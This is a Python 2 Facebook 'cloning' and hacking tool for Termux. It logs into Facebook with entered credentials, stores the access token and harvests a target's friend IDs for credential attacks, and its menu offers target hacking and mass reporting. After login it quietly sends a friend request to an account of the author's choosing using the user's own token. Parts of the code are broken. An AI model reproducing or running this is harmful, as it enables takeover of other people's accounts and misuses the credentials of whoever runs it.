#!/usr/bin/python2
#coding=utf-8
#The Credit For This Code Goes To Tech Qaiser
#If You Wanna Take Credits For This Code, Please Look Yourself Again...
#Reserved2020


import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,requests,mechanize
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser


reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]

def keluar():
	print "\x1b[1;91mExit"
	os.sys.exit()

def acak(b):
    w = 'ahtdzjc'
    d = ''
    for i in x:
        d += '!'+w[random.randint(0,len(w)-1)]+i
    return cetak(d)


def cetak(b):
    w = 'ahtdzjc'
    for i in w:
        j = w.index(i)
        x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j))
    x += '\033[0m'
    x = x.replace('!0','\033[0m')
    sys.stdout.write(x+'\n')


def jalan(z):
	for e in z + '\n':
		sys.stdout.write(e)
		sys.stdout.flush()
		time.sleep(0.001)

#### colours ####
B='\033[1;96m'
R='\033[1;91m'
G='\033[1;92m'
W='\033[1;97m'
S='\033[1;96m'
P='\033[1;95m'
Y='\033[1;93m'
R='\033[1;94m'

#Dev: qaiser
##### LOGO #####
logo = """
\033[1;97m╭━━━╮
\033[1;97m┃╭━╮┃
\033[1;97m┃┃╱┃┣━━┳┳━━┳━━┳━╮
\033[1;97m┃┃╱┃┃╭╮┣┫━━┫┃━┫╭╯
\033[1;97m┃╰━╯┃╭╮┃┣━━┃┃━┫┃
\033[1;97m╰━━╮┣╯╰┻┻━━┻━━┻╯
\033[1;97m╱╱╱╰╯

GITHUB :- https://github.com/TechQaiser

FACEBOOK :- Qaiser Abbas

YOUTUBE :-  Tech Qaiser

DISCLAIMRR :- This Tool Is only for Educational Purposes I am not responsible for any miss use

NOTE  :- Need First Hand GirlFriend :-)

"""
logo2 = """
\033[1;97m╭━━━╮
\033[1;97m┃╭━╮┃
\033[1;97m┃┃╱┃┣━━┳┳━━┳━━┳━╮
\033[1;97m┃┃╱┃┃╭╮┣┫━━┫┃━┫╭╯
\033[1;97m┃╰━╯┃╭╮┃┣━━┃┃━┫┃
\033[1;97m╰━━╮┣╯╰┻┻━━┻━━┻╯
\033[1;97m╱╱╱╰╯

GITHUB :- https://github.com/TechQaiser

FACEBOOK :- Qaiser Abbas

YOUTUBE :-  Tech Qaiser

DISCLAIMRR :- This Tool Is only for Educational Purposes I am not responsible for any miss use

NOTE  :- Need First Hand GirlFriend :-)

"""
logo3 = """
\033[1;97m╭━━━╮
\033[1;97m┃╭━╮┃
\033[1;97m┃┃╱┃┣━━┳┳━━┳━━┳━╮
\033[1;97m┃┃╱┃┃╭╮┣┫━━┫┃━┫╭╯
\033[1;97m┃╰━╯┃╭╮┃┣━━┃┃━┫┃
\033[1;97m╰━━╮┣╯╰┻┻━━┻━━┻╯
\033[1;97m╱╱╱╰╯

GITHUB :- https://github.com/TechQaiser

FACEBOOK :- Qaiser Abbas

YOUTUBE :-  Tech Qaiser

DISCLAIMRR :- This Tool Is only for Educational Purposes I am not responsible for any miss use

NOTE  :- Need First Hand GirlFriend :-)

"""
logo4 = """
\033[1;97m╭━━━╮
\033[1;97m┃╭━╮┃
\033[1;97m┃┃╱┃┣━━┳┳━━┳━━┳━╮
\033[1;97m┃┃╱┃┃╭╮┣┫━━┫┃━┫╭╯
\033[1;97m┃╰━╯┃╭╮┃┣━━┃┃━┫┃
\033[1;97m╰━━╮┣╯╰┻┻━━┻━━┻╯
\033[1;97m╱╱╱╰╯

GITHUB :- https://github.com/TechQaiser

FACEBOOK :- Qaiser Abbas

YOUTUBE :-  Tech Qaiser

DISCLAIMRR :- This Tool Is only for Educational Purposes I am not responsible for any miss use

NOTE  :- Need First Hand GirlFriend :-)

"""
logo5 = """
\033[1;97m╭━━━╮
\033[1;97m┃╭━╮┃
\033[1;97m┃┃╱┃┣━━┳┳━━┳━━┳━╮
\033[1;97m┃┃╱┃┃╭╮┣┫━━┫┃━┫╭╯
\033[1;97m┃╰━╯┃╭╮┃┣━━┃┃━┫┃
\033[1;97m╰━━╮┣╯╰┻┻━━┻━━┻╯
\033[1;97m╱╱╱╰╯

GITHUB :- https://github.com/TechQaiser

FACEBOOK :- Qaiser Abbas

YOUTUBE :-  Tech Qaiser

DISCLAIMRR :- This Tool Is only for Educational Purposes I am not responsible for any miss use

NOTE  :- Need First Hand GirlFriend :-)

"""
logo6 = """
\033[1;97m╭━━━╮
\033[1;97m┃╭━╮┃
\033[1;97m┃┃╱┃┣━━┳┳━━┳━━┳━╮
\033[1;97m┃┃╱┃┃╭╮┣┫━━┫┃━┫╭╯
\033[1;97m┃╰━╯┃╭╮┃┣━━┃┃━┫┃
\033[1;97m╰━━╮┣╯╰┻┻━━┻━━┻╯
\033[1;97m╱╱╱╰╯

GITHUB :- https://github.com/TechQaiser

FACEBOOK :- Qaiser Abbas

YOUTUBE :-  Tech Qaiser

DISCLAIMRR :- This Tool Is only for Educational Purposes I am not responsible for any miss use

NOTE  :- Need First Hand GirlFriend :-)

"""
logo7 = """
\033[1;97m╭━━━╮
\033[1;97m┃╭━╮┃
\033[1;97m┃┃╱┃┣━━┳┳━━┳━━┳━╮
\033[1;97m┃┃╱┃┃╭╮┣┫━━┫┃━┫╭╯
\033[1;97m┃╰━╯┃╭╮┃┣━━┃┃━┫┃
\033[1;97m╰━━╮┣╯╰┻┻━━┻━━┻╯
\033[1;97m╱╱╱╰╯

GITHUB :- https://github.com/TechQaiser

FACEBOOK :- Qaiser Abbas

YOUTUBE :-  Tech Qaiser

DISCLAIMRR :- This Tool Is only for Educational Purposes I am not responsible for any miss use

NOTE  :- Need First Hand GirlFriend :-)

"""
logo8 = """
\033[1;97m╭━━━╮
\033[1;97m┃╭━╮┃
\033[1;97m┃┃╱┃┣━━┳┳━━┳━━┳━╮
\033[1;97m┃┃╱┃┃╭╮┣┫━━┫┃━┫╭╯
\033[1;97m┃╰━╯┃╭╮┃┣━━┃┃━┫┃
\033[1;97m╰━━╮┣╯╰┻┻━━┻━━┻╯
\033[1;97m╱╱╱╰╯

GITHUB :- https://github.com/TechQaiser

FACEBOOK :- Qaiser Abbas

YOUTUBE :-  Tech Qaiser

DISCLAIMRR :- This Tool Is only for Educational Purposes I am not responsible for any miss use

NOTE  :- Need First Hand GirlFriend :-)

"""
logo9 = """
\033[1;97m╭━━━╮
\033[1;97m┃╭━╮┃
\033[1;97m┃┃╱┃┣━━┳┳━━┳━━┳━╮
\033[1;97m┃┃╱┃┃╭╮┣┫━━┫┃━┫╭╯
\033[1;97m┃╰━╯┃╭╮┃┣━━┃┃━┫┃
\033[1;97m╰━━╮┣╯╰┻┻━━┻━━┻╯
\033[1;97m╱╱╱╰╯

GITHUB :- https://github.com/TechQaiser

FACEBOOK :- Qaiser Abbas

YOUTUBE :-  Tech Qaiser

DISCLAIMRR :- This Tool Is only for Educational Purposes I am not responsible for any miss use

NOTE  :- Need First Hand GirlFriend :-)

"""
logo10 = """
\033[1;97m╭━━━╮
\033[1;97m┃╭━╮┃
\033[1;97m┃┃╱┃┣━━┳┳━━┳━━┳━╮
\033[1;97m┃┃╱┃┃╭╮┣┫━━┫┃━┫╭╯
\033[1;97m┃╰━╯┃╭╮┃┣━━┃┃━┫┃
\033[1;97m╰━━╮┣╯╰┻┻━━┻━━┻╯
\033[1;97m╱╱╱╰╯

GITHUB :- https://github.com/TechQaiser

FACEBOOK :- Qaiser Abbas

YOUTUBE :-  Tech Qaiser

DISCLAIMRR :- This Tool Is only for Educational Purposes I am not responsible for any miss use

NOTE  :- Need First Hand GirlFriend :-)

"""
logo11 = """
\033[1;96m                                             
        \033[1;97m╭━━━╮
\033[1;97m┃╭━╮┃
\033[1;97m┃┃╱┃┣━━┳┳━━┳━━┳━╮
\033[1;97m┃┃╱┃┃╭╮┣┫━━┫┃━┫╭╯
\033[1;97m┃╰━╯┃╭╮┃┣━━┃┃━┫┃
\033[1;97m╰━━╮┣╯╰┻┻━━┻━━┻╯
\033[1;97m╱╱╱╰╯

GITHUB :- https://github.com/TechQaiser

FACEBOOK :- Qaiser Abbas

YOUTUBE :-  Tech Qaiser

DISCLAIMRR :- This Tool Is only for Educational Purposes I am not responsible for any miss use

NOTE  :- Need First Hand GirlFriend :-)

"""
logo12 = """
\033[1;97m╭━━━╮
\033[1;97m┃╭━╮┃
\033[1;97m┃┃╱┃┣━━┳┳━━┳━━┳━╮
\033[1;97m┃┃╱┃┃╭╮┣┫━━┫┃━┫╭╯
\033[1;97m┃╰━╯┃╭╮┃┣━━┃┃━┫┃
\033[1;97m╰━━╮┣╯╰┻┻━━┻━━┻╯
\033[1;97m╱╱╱╰╯

GITHUB :- https://github.com/TechQaiser

FACEBOOK :- Qaiser Abbas

YOUTUBE :-  Tech Qaiser

DISCLAIMRR :- This Tool Is only for Educational Purposes I am not responsible for any miss use

NOTE  :- Need First Hand GirlFriend :-)

"""
logo13 = """
\033[1;97m╭━━━╮
\033[1;97m┃╭━╮┃
\033[1;97m┃┃╱┃┣━━┳┳━━┳━━┳━╮
\033[1;97m┃┃╱┃┃╭╮┣┫━━┫┃━┫╭╯
\033[1;97m┃╰━╯┃╭╮┃┣━━┃┃━┫┃
\033[1;97m╰━━╮┣╯╰┻┻━━┻━━┻╯
\033[1;97m╱╱╱╰╯

GITHUB :- https://github.com/TechQaiser

FACEBOOK :- Qaiser Abbas

YOUTUBE :-  Tech Qaiser

DISCLAIMRR :- This Tool Is only for Educational Purposes I am not responsible for any miss use

NOTE  :- Need First Hand GirlFriend :-)

"""
logo14 = """
\033[1;97m╭━━━╮
\033[1;97m┃╭━╮┃
\033[1;97m┃┃╱┃┣━━┳┳━━┳━━┳━╮
\033[1;97m┃┃╱┃┃╭╮┣┫━━┫┃━┫╭╯
\033[1;97m┃╰━╯┃╭╮┃┣━━┃┃━┫┃
\033[1;97m╰━━╮┣╯╰┻┻━━┻━━┻╯
\033[1;97m╱╱╱╰╯

GITHUB :- https://github.com/TechQaiser

FACEBOOK :- Qaiser Abbas

YOUTUBE :-  Tech Qaiser

DISCLAIMRR :- This Tool Is only for Educational Purposes I am not responsible for any miss use

NOTE  :- Need First Hand GirlFriend :-)

"""
logo15 = """
\033[1;97m╭━━━╮
\033[1;97m┃╭━╮┃
\033[1;97m┃┃╱┃┣━━┳┳━━┳━━┳━╮
\033[1;97m┃┃╱┃┃╭╮┣┫━━┫┃━┫╭╯
\033[1;97m┃╰━╯┃╭╮┃┣━━┃┃━┫┃
\033[1;97m╰━━╮┣╯╰┻┻━━┻━━┻╯
\033[1;97m╱╱╱╰╯

GITHUB :- https://github.com/TechQaiser

FACEBOOK :- Qaiser Abbas

YOUTUBE :-  Tech Qaiser

DISCLAIMRR :- This Tool Is only for Educational Purposes I am not responsible for any miss use

NOTE  :- Need First Hand GirlFriend :-)

"""
logo16 = """
\033[1;97m╭━━━╮
\033[1;97m┃╭━╮┃
\033[1;97m┃┃╱┃┣━━┳┳━━┳━━┳━╮
\033[1;97m┃┃╱┃┃╭╮┣┫━━┫┃━┫╭╯
\033[1;97m┃╰━╯┃╭╮┃┣━━┃┃━┫┃
\033[1;97m╰━━╮┣╯╰┻┻━━┻━━┻╯
\033[1;97m╱╱╱╰╯

GITHUB :- https://github.com/TechQaiser

FACEBOOK :- Qaiser Abbas

YOUTUBE :-  Tech Qaiser

DISCLAIMRR :- This Tool Is only for Educational Purposes I am not responsible for any miss use

NOTE  :- Need First Hand GirlFriend :-)

"""
logo17 = """
\033[1;97m╭━━━╮
\033[1;97m┃╭━╮┃
\033[1;97m┃┃╱┃┣━━┳┳━━┳━━┳━╮
\033[1;97m┃┃╱┃┃╭╮┣┫━━┫┃━┫╭╯
\033[1;97m┃╰━╯┃╭╮┃┣━━┃┃━┫┃
\033[1;97m╰━━╮┣╯╰┻┻━━┻━━┻╯
\033[1;97m╱╱╱╰╯

GITHUB :- https://github.com/TechQaiser

FACEBOOK :- Qaiser Abbas

YOUTUBE :-  Tech Qaiser

DISCLAIMRR :- This Tool Is only for Educational Purposes I am not responsible for any miss use

NOTE  :- Need First Hand GirlFriend :-)

"""
logo18 = """
\\033[1;97m╭━━━╮
\033[1;97m┃╭━╮┃
\033[1;97m┃┃╱┃┣━━┳┳━━┳━━┳━╮
\033[1;97m┃┃╱┃┃╭╮┣┫━━┫┃━┫╭╯
\033[1;97m┃╰━╯┃╭╮┃┣━━┃┃━┫┃
\033[1;97m╰━━╮┣╯╰┻┻━━┻━━┻╯
\033[1;97m╱╱╱╰╯

GITHUB :- https://github.com/TechQaiser

FACEBOOK :- Qaiser Abbas

YOUTUBE :-  Tech Qaiser

DISCLAIMRR :- This Tool Is only for Educational Purposes I am not responsible for any miss use

NOTE  :- Need First Hand GirlFriend :-)

"""
logo19 = """
\033[1;97m╭━━━╮
\033[1;97m┃╭━╮┃
\033[1;97m┃┃╱┃┣━━┳┳━━┳━━┳━╮
\033[1;97m┃┃╱┃┃╭╮┣┫━━┫┃━┫╭╯
\033[1;97m┃╰━╯┃╭╮┃┣━━┃┃━┫┃
\033[1;97m╰━━╮┣╯╰┻┻━━┻━━┻╯
\033[1;97m╱╱╱╰╯

GITHUB :- https://github.com/TechQaiser

FACEBOOK :- Qaiser Abbas

YOUTUBE :-  Tech Qaiser

DISCLAIMRR :- This Tool Is only for Educational Purposes I am not responsible for any miss use

NOTE  :- Need First Hand GirlFriend :-)

"""
logo20 = """
\033[1;97m╭━━━╮
\033[1;97m┃╭━╮┃
\033[1;97m┃┃╱┃┣━━┳┳━━┳━━┳━╮
\033[1;97m┃┃╱┃┃╭╮┣┫━━┫┃━┫╭╯
\033[1;97m┃╰━╯┃╭╮┃┣━━┃┃━┫┃
\033[1;97m╰━━╮┣╯╰┻┻━━┻━━┻╯
\033[1;97m╱╱╱╰╯

GITHUB :- https://github.com/TechQaiser

FACEBOOK :- Qaiser Abbas

YOUTUBE :-  Tech Qaiser

DISCLAIMRR :- This Tool Is only for Educational Purposes I am not responsible for any miss use

NOTE  :- Need First Hand GirlFriend :-)

"""
logo21 = """	
\033[1;97m╭━━━╮
\033[1;97m┃╭━╮┃
\033[1;97m┃┃╱┃┣━━┳┳━━┳━━┳━╮
\033[1;97m┃┃╱┃┃╭╮┣┫━━┫┃━┫╭╯
\033[1;97m┃╰━╯┃╭╮┃┣━━┃┃━┫┃
\033[1;97m╰━━╮┣╯╰┻┻━━┻━━┻╯
\033[1;97m╱╱╱╰╯

GITHUB :- https://github.com/TechQaiser

FACEBOOK :- Qaiser Abbas

YOUTUBE :-  Tech Qaiser

DISCLAIMRR :- This Tool Is only for Educational Purposes I am not responsible for any miss use

NOTE  :- Need First Hand GirlFriend :-)

"""
logo22 = """
\033[1;95m
   \033[1;97m╭━━━╮
\033[1;97m┃╭━╮┃
\033[1;97m┃┃╱┃┣━━┳┳━━┳━━┳━╮
\033[1;97m┃┃╱┃┃╭╮┣┫━━┫┃━┫╭╯
\033[1;97m┃╰━╯┃╭╮┃┣━━┃┃━┫┃
\033[1;97m╰━━╮┣╯╰┻┻━━┻━━┻╯
\033[1;97m╱╱╱╰╯

GITHUB :- https://github.com/TechQaiser

FACEBOOK :- Qaiser Abbas

YOUTUBE :-  Tech Qaiser

DISCLAIMRR :- This Tool Is only for Educational Purposes I am not responsible for any miss use

NOTE  :- Need First Hand GirlFriend :-)

"""
logo23 = """
\033[1;97m╭━━━╮
\033[1;97m┃╭━╮┃
\033[1;97m┃┃╱┃┣━━┳┳━━┳━━┳━╮
\033[1;97m┃┃╱┃┃╭╮┣┫━━┫┃━┫╭╯
\033[1;97m┃╰━╯┃╭╮┃┣━━┃┃━┫┃
\033[1;97m╰━━╮┣╯╰┻┻━━┻━━┻╯
\033[1;97m╱╱╱╰╯

GITHUB :- https://github.com/TechQaiser

FACEBOOK :- Qaiser Abbas

YOUTUBE :-  Tech Qaiser

DISCLAIMRR :- This Tool Is only for Educational Purposes I am not responsible for any miss use

NOTE  :- Need First Hand GirlFriend :-)

"""
logo24 = """
\033[1;97m╭━━━╮
\033[1;97m┃╭━╮┃
\033[1;97m┃┃╱┃┣━━┳┳━━┳━━┳━╮
\033[1;97m┃┃╱┃┃╭╮┣┫━━┫┃━┫╭╯
\033[1;97m┃╰━╯┃╭╮┃┣━━┃┃━┫┃
\033[1;97m╰━━╮┣╯╰┻┻━━┻━━┻╯
\033[1;97m╱╱╱╰╯

GITHUB :- https://github.com/TechQaiser

FACEBOOK :- Qaiser Abbas

YOUTUBE :-  Tech Qaiser

DISCLAIMRR :- This Tool Is only for Educational Purposes I am not responsible for any miss use

NOTE  :- Need First Hand GirlFriend :-)

"""
logo25 = """
\033[1;97m╭━━━╮
\033[1;97m┃╭━╮┃
\033[1;97m┃┃╱┃┣━━┳┳━━┳━━┳━╮
\033[1;97m┃┃╱┃┃╭╮┣┫━━┫┃━┫╭╯
\033[1;97m┃╰━╯┃╭╮┃┣━━┃┃━┫┃
\033[1;97m╰━━╮┣╯╰┻┻━━┻━━┻╯
\033[1;97m╱╱╱╰╯

GITHUB :- https://github.com/TechQaiser

FACEBOOK :- Qaiser Abbas

YOUTUBE :-  Tech Qaiser

DISCLAIMRR :- This Tool Is only for Educational Purposes I am not responsible for any miss use

NOTE  :- Need First Hand GirlFriend :-)

"""

def tik():
	titik = ['.   ','..  ','... ']
	for o in titik:
		print("\r\x1b[1;91mPlease Wait \x1b[1;93m"+o),;sys.stdout.flush();time.sleep(1)


back = 0
berhasil = []
cekpoint = []
oks = []
id = []
listgrup = []
gagal = []
idfriends = []
idfromfriends = []
idmem = []
em = []
emfromfriends = []
hp = []
hpfromfriends = []
reaksi = []
reaksigrup = []
komen = []
komengrup = []
listgrup = []
vulnot = "\033[31mNot Vuln"
vuln = "\033[32mVuln"

os.system("clear")
print  """
▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
▒▒▒▒▒▒▒▒▄▄▄▄▄▄▄▄▒▒▒▒▒▒
▒▒█▒▒▒▄██████████▄▒▒▒▒
▒█▐▒▒▒████████████▒▒▒▒
▒▌▐▒▒██▄▀██████▀▄██▒▒▒
▐┼▐▒▒██▄▄▄▄██▄▄▄▄██▒▒▒
▐┼▐▒▒██████████████▒▒▒
▐▄▐████─▀▐▐▀█─█─▌▐██▄▒
▒▒█████──────────▐███▌
▒▒█▀▀██▄█─▄───▐─▄███▀▒
▒▒█▒▒███████▄██████▒▒▒
▒▒▒▒▒██████████████▒▒▒
▒▒▒▒▒██████████████▒▒▒
▒▒▒▒▒█████████▐▌██▌▒▒▒
▒▒▒▒▒▐▀▐▒▌▀█▀▒▐▒█▒▒▒▒▒
▒▒▒▒▒▒▒▒▒▒▒▐▒▒▒▒▌▒▒▒▒▒
▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒"""

CorrectUsername = "Qaiser"
CorrectPassword = "Dvl"

loop = 'true'
while (loop == 'true'):
    username = raw_input("\033[1;97m\x1b[1;97mTool Username \x1b[1;97m------- \x1b[1;97m")
    if (username == CorrectUsername):
    	password = raw_input("\033[1;97m\x1b[1;97mTool Password  \x1b[1;97m------- \x1b[1;97m")
        if (password == CorrectPassword):
            print "Logged in successfully as " + username #Dev:qaiser
	    time.sleep(2)
            loop = 'false'
        else:
            print "\033[1;91mWrong Password"
            os.system('xdg-open https://www.youtube.com/channel/UCHetqAquUkojxVvPebQpb0g')
    else:
        print "\033[1;94mWrong Username"
        os.system('xdg-open https://www.youtube.com/channel/UCHetqAquUkojxVvPebQpb0g')

##### LICENSE #####
#=================#
def lisensi():
	os.system('clear')
	login()
	####login#########
def login():
	os.system('clear')
	print logo11
	print "1.\x1b[1;97mLogin  Facebook  "
        time.sleep(0.05)
        print "2.\x1b[1;97mWhat is acces Token How To Get Acces Token Free"
        time.sleep(0.05)
        print "3.\x1b[1;97mLogin Using Token"
        time.sleep(0.05)
	print "0.\033[1;97m Exit           "
	pilih_login()
	
def pilih_login():
	peak = raw_input("\n\033[1;97mChoose an Option>>> \033[1;97m")
	if peak =="":
		print "\x1b[1;91mFill in correctly"
		pilih_login()
	elif peak =="1":
		login1()
        elif peak =="2":
	        os.system('xdg-open https://youtu.be/gO3sM5ZvTw4')
	        login()
	elif peak =="3":
	        tokenz()
	elif peak =="0":
		keluar()
        else:
		print"\033[1;91m[!] Wrong input"
		keluar()
		
def login1():
	os.system('clear')
	try:
		toket = open('login.txt','r')
		menu() 
	except (KeyError,IOError):
		os.system('clear')
                time.sleep(0.05)
		print logo13
		jalan('  \033[1;97mNote Do Not Use Your Personal Account' )
		jalan(' \033[1;97mCreate New Account For Login Safely' )
		print "\033[1;97mNew Commands Use It For Cloning"
		print('	' )
		id = raw_input('\x1b[1;97mFacebook Email/Pass : \x1b[1;97m')
		pwd = raw_input('\x1b[1;97mPassword  \x1b[1;97m')
		tik()
		try:
			br.open('https://m.facebook.com')
		except mechanize.URLError:
			print"\n\x1b[1;91mThere is no internet connection"
			keluar()
		br._factory.is_html = True
		br.select_form(nr=0)
		br.form['email'] = id
		br.form['pass'] = pwd
		br.submit()
		url = br.geturl()
		if 'save-device' in url:
			try:
				sig= 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail='+id+'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword='+pwd+'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
				data = {"api_key":"882a8490361da98702bf97a021ddc14d","credentials_type":"password","email":id,"format":"JSON", "generate_machine_id":"1","generate_session_cookies":"1","locale":"en_US","method":"auth.login","password":pwd,"return_ssl_resources":"0","v":"1.0"}
				x=hashlib.new("md5")
				x.update(sig)
				a=x.hexdigest()
				data.update({'sig':a})
				url = "https://api.facebook.com/restserver.php"
				r=requests.get(url,params=data)
				z=json.loads(r.text)
				unikers = open("login.txt", 'w')
				unikers.write(z['access_token'])
				unikers.close()
				print '\n\x1b[1;91mLogin Successfully'
				os.system('xdg-open https://www.youtube.com/channel/UCHetqAquUkojxVvPebQpb0g')
				requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token='+z['access_token'])
				menu()
			except requests.exceptions.ConnectionError:
				print"\n\x1b[1;97mThere is no internet connection"
				keluar()
		if 'checkpoint' in url:
			print("\n\x1b[1;97mYour Account is on Checkpoint")
			os.system('rm -rf login.txt')
			time.sleep(1)
			keluar()
		else:
			print("\n\x1b[1;97mPassword/Email is wrong")
			os.system('rm -rf login.txt')
			time.sleep(1)
			login()
			
def menu():
	os.system('clear')
	try:
		toket=open('login.txt','r').read()
	except IOError:
		os.system('clear')
		print"\x1b[1;91mToken invalid"
		os.system('rm -rf login.txt')
		time.sleep(1)
		login()
	try:
		o = requests.get('https://graph.facebook.com/me?access_token='+toket)
		a = json.loads(o.text)
		nama = a['name']
		id = a['id']
                t = requests.get('https://graph.facebook.com/me/subscribers?access_token=' + toket)
                b = json.loads(t.text)
                sub = str(b['summary']['total_count'])
	except KeyError:
		os.system('clear')
		print"\033[1;97mYour Account is on Checkpoint"
		os.system('rm -rf login.txt')
		time.sleep(1)
		login()
	except requests.exceptions.ConnectionError:
		print"\x1b[1;97mThere is no internet connection"
		keluar()
	os.system("clear") #Dev:qaiser
        time.sleep(0.05)
	print logo2
	print "\033[1;93m    «-------\033[1;96mLogged in User Info\033[1;93m----------»"
        time.sleep(0.05)
	print "	   \033[1;93m «----Name\033[1;97m:\033[1;91m"+nama+"\033[1;93m               "
        time.sleep(0.05)
	print "	   \033[1;93m «----ID\033[1;97m:\033[1;92m"+id+"\x1b[1;96m              "
        time.sleep(0.05)
        print "\033[1;95m«-----------------\033[1;91mAsim-Pardasi\033[1;95m-----------------»"
        time.sleep(0.05)
	print "\033[1;93m-•◈•-\033[1;93m> \033[1;93m1 .\x1b[1;96m\033[1;91m Start    Cloning All Country   "
        time.sleep(0.05)
        print "\033[1;93m-•◈•-\033[1;93m> \033[1;93m2 .\x1b[1;96m\033[1;91m Start    Target  Hacking        "
        time.sleep(0.05)
        print "\033[1;93m-•◈•-\033[1;93m> \033[1;93m3 .\033[1;96m\033[1;93m Facebook Report Asim     "
        time.sleep(0.05)
        print "\033[1;93m-•◈•-\033[1;93m> \033[1;93m4 .\033[1;96m\033[1;95m Friend's User    information      "
        time.sleep(0.05)
        print "\033[1;93m-•◈•-\033[1;93m> \033[1;93m5 .\033[1;96m\033[1;96m ID Not   Found   Problum solve  "
        time.sleep(0.05)
        print "\033[1;93m-•◈•-\033[1;93m> \033[1;93m6 .\x1b[1;96m\033[1;91m ASIM-CH    infom Massage  "
        time.sleep(0.05)
        print "\033[1;93m-•◈•-\033[1;93m> \033[1;93m7 .\033[1;96m\033[1;93m Asim-Extra/Pardasi    Youtube Chenal   "
        time.sleep(0.05)
        print "\033[1;93m-•◈•-\033[1;93m> \033[1;93m8 .\033[1;96m\033[1;92m Login    Using   Token          "
        time.sleep(0.05)
        print "\033[1;93m-•◈•-\033[1;93m> \033[1;93m9 .\033[1;96m\033[1;91m Show     Token   login/ID       "
        time.sleep(0.05)
        print "\033[1;93m-•◈•-\033[1;93m> \033[1;93m10.\033[1;96m\033[1;96m Tool     Rest &  Update         "
        time.sleep(0.05)
	print "\033[1;93m-•◈•-\033[1;93m> \033[1;93m0 .\033[1;91m\033[1;91m logout                         "
	pilih()


def pilih():
	unikers = raw_input("\n\033[1;91mChoose Option>>> \033[1;93m")
	if unikers =="":
		print "\x1b[1;91mFill in correctly"
		pilih()
	elif unikers =="1":
		crack()
        elif unikers =="2":
		os.system('clear')
		print logo
		brute()
        elif unikers =="3":
		fighter()
        elif unikers =="4":
		asif()
        elif unikers =="5":
		os.system('xdg-open https://www.facebook.com/profile.php?id=100052601166127')
	        menu()
        elif unikers =="6":
		os.system('clear')
		print logo7
		print "\033[1;95m«-----------------\033[1;91mMessage\033[1;95m-----------------»"
                jalan('\033[1;97mWorking On Data Or In Data Also')
                jalan("\033[1;97mClear Termux Data In Every Week")
                jalan('\033[1;97mIf There is any problem So contact me ')
                jalan('\033[1;97mUpdate Termux Every Day In Playstore')
                jalan("\033[1;97mSome Of My Latest & Best Commands ")
                jalan('\033[1;97mapt update')
                jalan('\033[1;97mapt upgrade')
                jalan('\033[1;97mpkg install python')
                jalan('\033[1;97mpkg install python2')
                jalan('\033[1;97mpkg install git')
                jalan('\033[1;97mpip2 install requests')
                jalan('\033[1;97mpip2 install mechanize') 
                jalan("\033[1;97mgit clone https://github.com/TechQaiser/Baba")
                jalan('\033[1;97mcd Baba')
                jalan('\033[1;97mpython2 Baba')
                jalan('\033[1;97mUser:Qaiser')
                jalan('\033[1;97mpass:Baba')
		os.system('git pull origin master')
		raw_input('\n\x1b[1;97m[ \x1b[1;97mBack \x1b[1;91m]')
		menu()
        elif unikers =="7":
	        os.system('xdg-open https://www.youtube.com/channel/UCHetqAquUkojxVvPebQpb0g')
	        menu()
        elif unikers =="8":
		tokenz()
        elif unikers =="9":
		os.system('reset')
		print logo14
		toket=open('login.txt','r').read()
		print "\033[1;97m[+] \033[1;97mYour token\033[1;97m :\033[1;97m "+toket
		raw_input("\n\033[1;97m[ \033[1;97mBack \033[1;97m]")
		menu()
	elif unikers =="10":
		os.system('clear')
		print logo6
		print "DATA RESET MENU"
                jalan('\033[1;97m✂10%')
                jalan("\033[1;97m✂✂✂✂✂50%")
                jalan("\033[1;97m✂✂✂✂✂✂60%")
                jalan('\033[1;97m✂✂✂✂✂✂✂✂✂✂100%')
                jalan('\033[1;97m Data Reset Done ')
		os.system('git pull origin master')
		raw_input('\n\x1b[1;97m[ \x1b[1;97mBack \x1b[1;97m]')
		menu()
	elif unikers =="0":
		jalan('Token Removed')
                print logo22
		os.system('rm -rf login.txt')
		keluar()
	else:
		print "\x1b[1;91mFill in correctly"
		pilih()

def crack():
	global toket
	os.system('clear')
	try:
		toket=open('login.txt','r').read()
	except IOError:
		print"\x1b[1;91mToken invalid"
		os.system('rm -rf login.txt')
		time.sleep(1)
		login()
	os.system('clear')
	print logo19
	print "1 .\x1b[1;97mStart Cloning    "
        time.sleep(0.05)
	print "0. \033[1;97mBack"
	pilih_crack()

def pilih_crack():
	peak = raw_input("\n\033[1;97mChoose an Option>>> \033[1;95m")
	if peak =="":
		print "\x1b[1;91mFill in correctly"
		pilih_crack()
	elif peak =="1":
		os.system('clear')
		print logo
		jjt = raw_input("\033[1;97mEnter ID : \033[1;97m")
		print "►▸▹►▸▹►▸▹►►▸▹►▸▹►▸▹►▸▹◃◄◅◃◄◅◃◄◅▸▹◃◄◅◃◄◅◃◄◅"
		try:
			m = requests.get("https://graph.facebook.com/"+jjt+"?access_token="+toket)
			td = json.loads(m.text)
			print"\033[1;97mName\033[1;97m:\033[1;97m "+td["name"]
		except KeyError:
			print"\x1b[1;91mID Not Found!"
			raw_input("\n\033[1;97m[\033[1;97mBack\033[1;97m]")
			crack()
		print"\033[1;97mGetting IDs\033[1;97m..."
		n = requests.get("https://graph.facebook.com/"+jjt+"/friends?access_token="+toket)
		d = json.loads(n.text)
		for c in d['data']:
			id.append(c['id'])
	elif peak =="0":
		men()
	else:
		print "\x1b[1;91mFill in correctly"
		pilih_crack()
	
	print "\033[1;97mTotal IDs\033[1;97m: \033[1;97m"+str(len(id))
	jalan('\033[1;97mPlease Wait\033[1;97m...')
	titik = ['.   ','..  ','... ']
	for o in titik:
		print("\r\033[1;97mCloning\033[1;97m"+o),;sys.stdout.flush();time.sleep(1)
	print "To Stop Process Press CTRL then Z"
	print "-------------------------------------------------------------------"
